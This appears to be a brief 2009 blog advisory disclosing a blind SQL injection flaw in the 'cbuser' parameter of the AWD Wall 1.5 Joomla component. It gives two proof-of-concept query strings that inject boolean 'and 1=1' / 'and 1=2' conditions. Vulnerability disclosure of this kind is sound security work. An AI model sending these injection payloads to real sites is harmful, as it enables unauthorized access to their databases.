jeffchannell.com

AWD Wall 1.5 Blind SQL Injection Vulnerability

Posted in Joomla!
2009-10-16 05:19:48 +0000 UTC

The Joomla component AWD Wall 1.5 suffers from an SQL Injection vulnerability in its handling of the 'cbuser' parameter.

?option=com_awdwall&view=awdwall&cbuser=62 and 1=1 limit 1 -- '
?option=com_awdwall&view=awdwall&cbuser=62 and 1=2 limit 1 -- '